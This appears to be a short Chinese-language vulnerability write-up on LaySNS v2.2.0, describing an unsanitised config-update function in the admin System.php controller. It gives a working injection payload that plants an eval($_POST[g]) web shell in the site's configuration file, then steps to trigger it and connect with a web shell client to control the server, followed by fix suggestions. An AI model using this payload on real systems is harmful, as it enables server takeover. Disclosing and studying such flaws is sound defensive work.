0x00 环境准备
LaySNS官网:http://www.laysns.com/
网站源码版本:LaySNS_v2.2.0
程序源码下载:https://pan.lanzou.com/i0l38li
默认后台地址:http://127.0.0.1/admin.php/login/index.html
默认账号密码:admin/admin
测试网站首页:
0x01 代码分析
1、 漏洞文件位置:/application/admin/controller/System.php 第35-81行
这段函数在更新配置的时候,未对参数进行任何处理,攻击者可以将恶意代码插入配置文件,导致程序在实现上存在代码执行漏洞。攻击者可通过构造恶意脚本代码写入配置文件,从而执行命令,控制网站服务器权限。
0x02 漏洞利用
1、登录后台—系统配置--站点配置--网站模板--修改cms模板名
Payload:default',1=>eval($_POST[g]),'xx'=>'
2、访问http://127.0.0.1/application/extra/web.php,成功触发代码执行漏洞
3、通过菜刀连接,控制网站服务器
0x03 修复建议
1、写入配置文件前,对特殊字符(如”、<、>等)进行htmlencode处理;
2、全局配置可考虑写入数据库进行调用。
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。